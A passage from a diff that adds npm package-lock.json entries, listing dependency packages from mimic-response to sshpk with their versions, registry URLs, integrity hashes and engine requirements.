+ "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/minimisted": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/minimisted/-/minimisted-2.0.1.tgz", + "integrity": "sha512-1oPjfuLQa2caorJUM8HV8lGgWCc0qqAO1MNv/k05G4qslmsndV/5WdNZrqCiyqiz3wohia2Ij2B7w2Dr7/IyrA==", + "dependencies": { + "minimist": "^1.2.5" + } + }, + "node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + }, + "node_modules/negotiator": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", + "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/node-ensure": { + "version": "0.0.0", + "resolved": "https://registry.npmjs.org/node-ensure/-/node-ensure-0.0.0.tgz", + "integrity": "sha512-DRI60hzo2oKN1ma0ckc6nQWlHU69RH6xN0sjQTjMpChPfTYvKZdcQFfdYK2RWbJcKyUizSIy/l8OTGxMAM1QDw==" + }, + 
"node_modules/npm-run-path": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", + "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", + "dependencies": { + "path-key": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/object-inspect": { + "version": "1.13.4", + "resolved": "https://registry.npmjs.org/object-inspect/-/object-inspect-1.13.4.tgz", + "integrity": "sha512-W67iLl4J2EXEGTbfeHCffrjDfitvLANg0UlX3wFUUSTx92KXRFegMHUVgSqE+wvhAbi4WqjGg9czysTV2Epbew==", + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-is": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/object-is/-/object-is-1.1.5.tgz", + "integrity": "sha512-3cyDsyHgtmi7I7DfSSI2LDp6SK2lwvtbg0p0R1e0RvTqF5ceGx+K2dfSjm1bKDMVCFEDAQvy+o8c6a7VujOddw==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/object-keys": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/object-keys/-/object-keys-1.1.1.tgz", + "integrity": "sha512-NuAESUOUMrlIXOfHKzD6bpPu3tYt3xvjNdRIQ+FeT0lNb4K8WR70CaDxhuNguS2XG+GjkyMwOzsN5ZktImfhLA==", + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/object.assign": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/object.assign/-/object.assign-4.1.4.tgz", + "integrity": "sha512-1mxKf0e58bvyjSCtKYY4sRe9itRk3PJpquJOjeIkz885CczcI4IvJJDLPS72oowuSh+pBxUFROpX+TU++hxhZQ==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.1.4", + "has-symbols": "^1.0.3", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/on-finished": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/on-finished/-/on-finished-2.4.1.tgz", + "integrity": "sha512-oVlzkg3ENAhCk2zdv7IJwd/QUD4z2RxRwpkcGY8psCVcCYZNq4wYnVWALHM+brtuJjePWiYF/ClmuDr8Ch5+kg==", + "dependencies": { + "ee-first": "1.1.1" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/onetime": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", + "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", + "dependencies": { + "mimic-fn": "^2.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/ospath": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/ospath/-/ospath-1.2.2.tgz", + "integrity": "sha512-o6E5qJV5zkAbIDNhGSIlyOhScKXgQrSRMilfph0clDfM0nEnBOlKlH4sWDmG95BW/CvwNz0vmm7dJVtU2KlMiA==" + }, + "node_modules/p-map": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-4.0.0.tgz", + "integrity": "sha512-/bjOqmgETBYB5BoEeGVea8dmvHb2m9GLy1E9W43yeyfP6QQCZGFNa+XRceJEuDB6zqr+gKpIAmlLebMpykw/MQ==", + "dependencies": { + "aggregate-error": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": 
"https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pako": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", + "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==" + }, + "node_modules/parseurl": { + "version": "1.3.3", + "resolved": "https://registry.npmjs.org/parseurl/-/parseurl-1.3.3.tgz", + "integrity": "sha512-CiyeOxFT/JZyN5m0z9PfXw4SCBJ6Sygz1Dpl0wqjlhDEGGBP1GnsUVEL0p63hoG1fcj3fHynXi9NYO4nWOL+qQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "engines": { + "node": ">=8" + } + }, + "node_modules/path-to-regexp": { + "version": "0.1.12", + "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.12.tgz", + "integrity": "sha512-RA1GjUVMnvYFxuqovrEqZoxxW5NUZqbwKtYz/Tt7nXerk0LbLblQmrsgdeOxV5SFHf0UDggjS/bSeOZwt1pmEQ==" + }, + "node_modules/pdf-parse": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pdf-parse/-/pdf-parse-1.1.1.tgz", + "integrity": "sha512-v6ZJ/efsBpGrGGknjtq9J/oC8tZWq0KWL5vQrk2GlzLEQPUDB1ex+13Rmidl1neNN358Jn9EHZw5y07FFtaC7A==", + "dependencies": { + "debug": "^3.1.0", + "node-ensure": "^0.0.0" + }, + "engines": { + "node": ">=6.8.1" + } + }, + "node_modules/pdf-parse/node_modules/debug": { + "version": "3.2.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-3.2.7.tgz", + "integrity": "sha512-CFjzYYAi4ThfiQvizrFQevTTXHtnCqWfe7x1AhgEscTz6ZbLbfoLRLPugTQyBth6f8ZERVUSyWHFD/7Wu4t1XQ==", + "dependencies": { + "ms": "^2.1.1" + } + }, + "node_modules/pend": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/pend/-/pend-1.2.0.tgz", + "integrity": "sha512-F3asv42UuXchdzt+xXqfW1OGlVBe+mxa2mqI0pg5yAHZPvFmY3Y6drSf/GQ1A86WgWEN9Kzh/WrgKa6iGcHXLg==" + }, + "node_modules/performance-now": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", + "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" + }, + "node_modules/pify": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", + "integrity": "sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/pretty-bytes": { + "version": "5.6.0", + "resolved": "https://registry.npmjs.org/pretty-bytes/-/pretty-bytes-5.6.0.tgz", + "integrity": "sha512-FFw039TmrBqFK8ma/7OL3sDz/VytdtJr044/QUJtH0wK9lb9jLq9tJyIxUwtQJHwar2BqtiA4iCWSwo9JLkzFg==", + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/pretty-format": { + "version": "27.5.1", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-27.5.1.tgz", + "integrity": "sha512-Qb1gy5OrP5+zDf2Bvnzdl3jsTf1qXVMazbvCoKhtKqVs4/YK4ozX4gKQJJVyNe+cajNPn0KoC0MC3FUmaHWEmQ==", + "dependencies": { + "ansi-regex": "^5.0.1", + "ansi-styles": "^5.0.0", + "react-is": "^17.0.1" + }, + "engines": { + "node": "^10.13.0 || ^12.13.0 || ^14.15.0 || >=15.0.0" + } + }, + "node_modules/pretty-format/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": 
"sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/process": { + "version": "0.11.10", + "resolved": "https://registry.npmjs.org/process/-/process-0.11.10.tgz", + "integrity": "sha512-cdGef/drWFoydD1JsMzuFf8100nZl+GT+yacc2bEced5f9Rjk4z+WtFUTBu9PhOi9j/jfmBPu0mMEY4wIdAF8A==", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/proxy-addr": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz", + "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==", + "dependencies": { + "forwarded": "0.2.0", + "ipaddr.js": "1.9.1" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/proxy-from-env": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.0.0.tgz", + "integrity": "sha512-F2JHgJQ1iqwnHDcQjVBsq3n/uoaFL+iPW/eAeL7kVxy/2RrWaN4WroKjjvbsoRtv0ftelNyC01bjRhn/bhcf4A==" + }, + "node_modules/psl": { + "version": "1.9.0", + "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", + "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" + }, + "node_modules/pump": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "integrity": "sha512-LwZy+p3SFs1Pytd/jYct4wpv49HiYCqd9Rlc5ZVdk0V+8Yzv6jR5Blk3TRmPL1ft69TxP0IMZGJ+WPFU2BFhww==", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/punycode": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/qs": { + "version": "6.10.4", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.10.4.tgz", + "integrity": "sha512-OQiU+C+Ds5qiH91qh/mg0w+8nwQuLjM4F4M/PbmhDOoYehPh+Fb0bDjtR1sOvy7YKxvj28Y/M0PhP5uVX0kB+g==", + "dependencies": { + "side-channel": "^1.0.4" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/querystringify": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/querystringify/-/querystringify-2.2.0.tgz", + "integrity": "sha512-FIqgj2EUvTa7R50u0rGsyTftzjYmv/a3hO345bZNrqabNqjtgiDMgmo4mkUjd+nzU5oF3dClKqFIPUKybUyqoQ==" + }, + "node_modules/range-parser": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", + "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/raw-body": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.2.tgz", + "integrity": "sha512-8zGqypfENjCIqGhgXToC8aB2r7YrBX+AQAfIPs/Mlk+BtPTztOvTS01NRW/3Eh60J+a48lt8qsCzirQ6loCVfA==", + "dependencies": { + "bytes": "3.1.2", + "http-errors": "2.0.0", + "iconv-lite": "0.4.24", + "unpipe": "1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/react-is": { + "version": "17.0.2", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-17.0.2.tgz", + "integrity": "sha512-w2GsyukL62IJnlaff/nRegPQR94C/XXamvMWmSHRJ4y7Ts/4ocGRmTHvOs8PSE6pB3dWOrD/nueuU5sduBsQ4w==" + }, + "node_modules/readable-stream": { 
+ "version": "3.6.2", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", + "integrity": "sha512-9u/sniCrY3D5WdsERHzHE4G2YCXqoG5FTHUiCC4SIbr6XcLZBY05ya9EKjYek9O5xOAwjGq+1JdGBAS7Q9ScoA==", + "dependencies": { + "inherits": "^2.0.3", + "string_decoder": "^1.1.1", + "util-deprecate": "^1.0.1" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/regenerator-runtime": { + "version": "0.14.0", + "resolved": "https://registry.npmjs.org/regenerator-runtime/-/regenerator-runtime-0.14.0.tgz", + "integrity": "sha512-srw17NI0TUWHuGa5CFGGmhfNIeja30WMBfbslPNhf6JrqQlLN5gcrvig1oqPxiVaXb0oW0XRKtH6Nngs5lKCIA==" + }, + "node_modules/regexp.prototype.flags": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/regexp.prototype.flags/-/regexp.prototype.flags-1.5.1.tgz", + "integrity": "sha512-sy6TXMN+hnP/wMy+ISxg3krXx7BAtWVO4UouuCN/ziM9UEne0euamVNafDfvC83bRNr95y0V5iijeDQFUNpvrg==", + "dependencies": { + "call-bind": "^1.0.2", + "define-properties": "^1.2.0", + "set-function-name": "^2.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/request-progress": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/request-progress/-/request-progress-3.0.0.tgz", + "integrity": "sha512-MnWzEHHaxHO2iWiQuHrUPBi/1WeBf5PkxQqNyNvLl9VAYSdXkP8tQ3pBSeCPD+yw0v0Aq1zosWLz0BdeXpWwZg==", + "dependencies": { + "throttleit": "^1.0.0" + } + }, + "node_modules/requires-port": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/requires-port/-/requires-port-1.0.0.tgz", + "integrity": "sha512-KigOCHcocU3XODJxsu8i/j8T9tzT4adHiecwORRQ0ZZFcp7ahwXuRU1m+yuO90C5ZUyGeGfocHDI14M3L3yDAQ==" + }, + "node_modules/restore-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-3.1.0.tgz", + "integrity": "sha512-l+sSefzHpj5qimhFSE5a8nufZYAM3sBSVMAPtYkmC+4EH2anSGaEMXSD0izRQbu9nfyQ9y5JrVmp7E8oZrUjvA==", + "dependencies": { + "onetime": "^5.1.0", + "signal-exit": "^3.0.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/rfdc": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.3.0.tgz", + "integrity": "sha512-V2hovdzFbOi77/WajaSMXk2OLm+xNIeQdMMuB7icj7bk6zi2F8GGAxigcnDFpJHbNyNcgyJDiP+8nOrY5cZGrA==" + }, + "node_modules/rxjs": { + "version": "7.8.1", + "resolved": "https://registry.npmjs.org/rxjs/-/rxjs-7.8.1.tgz", + "integrity": "sha512-AA3TVj+0A2iuIoQkWEK/tqFjBq2j+6PO6Y0zJcvzLAFhEFIO3HL0vls9hWLncZbAAbK0mar7oZ4V079I/qPMxg==", + "dependencies": { + "tslib": "^2.1.0" + } + }, + "node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/safer-buffer": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", + "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + }, + "node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": 
"sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/send": { + "version": "0.19.0", + "resolved": "https://registry.npmjs.org/send/-/send-0.19.0.tgz", + "integrity": "sha512-dW41u5VfLXu8SJh5bwRmyYUbAoSB3c9uQh6L8h/KtsFREPWpbX1lrljJo186Jc4nmci/sGUZ9a0a0J2zgfq2hw==", + "dependencies": { + "debug": "2.6.9", + "depd": "2.0.0", + "destroy": "1.2.0", + "encodeurl": "~1.0.2", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "mime": "1.6.0", + "ms": "2.1.3", + "on-finished": "2.4.1", + "range-parser": "~1.2.1", + "statuses": "2.0.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/send/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/send/node_modules/debug/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==" + }, + "node_modules/send/node_modules/encodeurl": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.2.tgz", + "integrity": "sha512-TPJXq8JqFaVYm2CWmPvnP2Iyo4ZSM7/QKcSmuMLDObfpH5fi7RUGmd/rTDf+rut/saiDiQEeVTNgAmJEdAOx0w==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/send/node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "node_modules/serve-static": { + "version": "1.16.2", + "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.2.tgz", + "integrity": "sha512-VqpjJZKadQB/PEbEwvFdO43Ax5dFBZ2UECszz8bQ7pi7wt//PWe1P6MN7eCnjsatYtBT6EuiClbjSWP2WrIoTw==", + "dependencies": { + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "parseurl": "~1.3.3", + "send": "0.19.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/set-function-length": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/set-function-length/-/set-function-length-1.1.1.tgz", + "integrity": "sha512-VoaqjbBJKiWtg4yRcKBQ7g7wnGnLV3M8oLvVWwOk2PdYY6PEFegR1vezXR0tw6fZGF9csVakIRjrJiy2veSBFQ==", + "dependencies": { + "define-data-property": "^1.1.1", + "get-intrinsic": "^1.2.1", + "gopd": "^1.0.1", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/set-function-name": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/set-function-name/-/set-function-name-2.0.1.tgz", + "integrity": "sha512-tMNCiqYVkXIZgc2Hnoy2IvC/f8ezc5koaRFkCjrpWzGpCd3qbZXPzVy9MAZzK1ch/X0jvSkojys3oqJN0qCmdA==", + "dependencies": { + "define-data-property": "^1.0.1", + "functions-have-names": "^1.2.3", + "has-property-descriptors": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/setprototypeof": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz", + "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw==" + }, + "node_modules/sha.js": { + "version": 
"2.4.11", + "resolved": "https://registry.npmjs.org/sha.js/-/sha.js-2.4.11.tgz", + "integrity": "sha512-QMEp5B7cftE7APOjk5Y6xgrbWu+WkLVQwk8JNjZ8nKRciZaByEW6MubieAiToS7+dwvrjGhH8jRXz3MVd0AYqQ==", + "dependencies": { + "inherits": "^2.0.1", + "safe-buffer": "^5.0.1" + }, + "bin": { + "sha.js": "bin.js" + } + }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "engines": { + "node": ">=8" + } + }, + "node_modules/side-channel": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz", + "integrity": "sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.3", + "side-channel-list": "^1.0.0", + "side-channel-map": "^1.0.1", + "side-channel-weakmap": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-list": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.0.tgz", + "integrity": "sha512-FCLHtRD/gnpCiCHEiJLOwdmFP+wzCmDEkc9y7NsYxeF4u7Btsn1ZuwgwJGxImImHicJArLP4R0yX4c2KCrMrTA==", + "dependencies": { + "es-errors": "^1.3.0", + "object-inspect": "^1.13.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-map": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz", + "integrity": "sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/side-channel-weakmap": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz", + "integrity": "sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==", + "dependencies": { + "call-bound": "^1.0.2", + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.5", + "object-inspect": "^1.13.3", + "side-channel-map": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/signal-exit": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "funding": [ + { + "type": 
"github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } + }, + "node_modules/slice-ansi": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-3.0.0.tgz", + "integrity": "sha512-pSyv7bSTC7ig9Dcgbw9AuRNUb5k5V6oDudjZoMBSr13qpLBG7tB+zgCkARjq7xIUgdz5P1Qe8u+rSGdouOOIyQ==", + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/sshpk": { + "version": "1.18.0", + "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", + "integrity": 